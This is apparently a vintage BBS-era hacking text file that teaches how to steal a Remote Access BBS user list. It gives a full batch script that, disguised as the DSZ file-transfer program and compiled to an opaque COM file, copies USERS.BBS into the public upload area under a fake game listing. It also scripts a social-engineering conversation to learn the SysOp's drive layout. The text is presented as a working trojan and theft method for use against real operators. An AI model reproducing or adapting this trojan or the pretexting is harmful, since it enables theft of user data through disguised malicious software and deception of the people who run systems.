$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ Fun with RA bOaRds $ $ $ $ by vINCE nIEL $ $ $ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Remote Access BBS software sucks, and a SysOp who would want to run it is asking for it, so we're going to teach him a lesson by doing some fun things with his board. The first thing we will do is steal his user list. First a program must be found that the SysOp wants and will execute on his BBS system. It could be a wide range of items. It can be some soft- ware (doesn't have to be pirate) that the operator has been requesting for a while. For this demonstration, we will use DSZ . You will also need a program called BAT2EXEC.COM made by the staff at PC-Magazine. Its main purpose it to convert large Batch file to Com files. Com files run faster and cannot be aborted with ^C. DSZ includes- DSZ.DOC DSZ.EXE Rename DSZ.EXE to DSZ.DAT. Now, make a batch file called DSZ.BAT. It should look something like this. @ECHO OFF IF EXIST C:\RA\USERS.BBS GOTO COPY REM Checks to see if the USERS.BBS listing is there. GOTO DSZ :COPY IF EXIST D:\FILES\UPLOAD\GAME.ZIP GOTO DSZ REM Sets it to only copy once. REM Now we want to copy the USERS.BBS listing to the new file REN directory, under the name of GAME.ZIP COPY C:\RA\USERS.BBS D:\FILES\UPLOAD\GAME.ZIP >DMP.DMP REM DMP.DMP is used to redirect the screen output REM Now is the tricky part. You need to have FILES.BBS listing REM add TOOBIN1.ZIP to it's listing of on-line files. COPY DSZ.DMP + D:\FILES\UPLOAD\FILES.BBS D:\FILES\UPLOAD\FILES.BAK > DMP.DMP REM D:\files\upload will change depending on the sub-dir setup. REM DSZ.DMP, a file you will need to make, is appended to REM a listing of all available files. COPY D:\FILES\UPLOAD\FILES.BAK D:\FILES\UPLOAD\FILES.BBS >DMP.DMP DEL DMP.DMP :DSZ REM Now we want to run DSZ like normal. REN DSZ.DAT DZ.EXE REM Turn back on monitor DSZ %1 %2 %3 %4 %5 %6 %7 REN DZ.EXE DSZ.DAT REM All done! This is a generic program and you will have to tailor it so it will meet your needs. Now, run BAT2EXEC DSZ.BAT, to create DSZ.COM If the program does not "compile" and gives you some kind of error, that means that your program is 'too small' to be converted. Bat2exec was made for large files, and really does not like small ones. All you have to do is add a couple 100 ECHO statements at then end of your program and everything should be fine. Ok, remember how i said you need to add USERS.BBS (which was renamed game.zip) to the FILES.BBS listing? Ok, now create a file that is called DSZ.DMP, and that looks like this. GAME.ZIP Game Disk #1, cracked by INC! (Description should start on 14th line) Now I will recap what will happen when you have everything setup. The sysop sees that someone (You) has uploaded the newest version of DSZ Z-Modem, so he installs it. The files he places in his protocol directory are: DSZ.COM -Your batch file changed into COM. DSZ.DAT -The real DSZ DSZ.DOC -Docs to DSZ DSZ.DMP -Has text that says "game.zip" Now, he gets his BBS software to run DSZ.COM, which he thinks is DSZ. Because it's a com file, he can't tell what it does, which is the whole reason for using BAT2EXEC.COM anyway. There is no way he can tell what DSZ.COM does. DSZ.COM runs, and copies USERS.BBS listing to the new files listing under the name GAME.ZIP. Then, DSZ.DMP is added to the Files.BBS listing, so when you do a listing of new files, it will be there. Then DSZ.DAT is renamed to DZ.EXE. DZ.EXE is then run. Then DZ.EXE is renamed back to DSZ.DAT. Now, all you have to do is download GAME.ZIP, and you are off! This procedure I have created for Remote Access boards, but you have to know the SysOp's drive specifications. Whether he has a C: or D: drive, and what directory is Remote Access installed on. This can be found out simply by casually slipping it into the conversation. SysOp: "Whadda ya want? I'm masturbating!" You: "How's it going! Can I upload a really big big huge ware?" SysOp: "k00l k0dEz!!&^**@! Sure upload, I like uploads!" You "Do you have the space for it? Its really new and takes up a lot of space! How big is your hard disk?" SysOp: "D00d, my HD is 60o g1gz!" You: "So you only have one hard disk?" SysOp "No d00d, I have two; a c: and d:!" You: "we9o65hfgkjl9:r45976hyt sorry man Line Noise, :?.6 28+:7y3fdfvgjk goto run!" At this point you know all the information. The chances of the board not being under the sub-directory of \RA are extremely slim. If he says he has one HD, you're all set. If he says he has two, then it should probably be on the c: drive, but ask him just in case. Just slip it into the conversation. You'd be amazed how st00pid people can be! So Until Next Time... "You're only dancing on this earth for a short while." I can be reached at: The Clam Plate Orgy: (617) 596-0415 Maniacal Plunge : (617) 231-3074 Internet : foobar@silver.lcs.mit.edu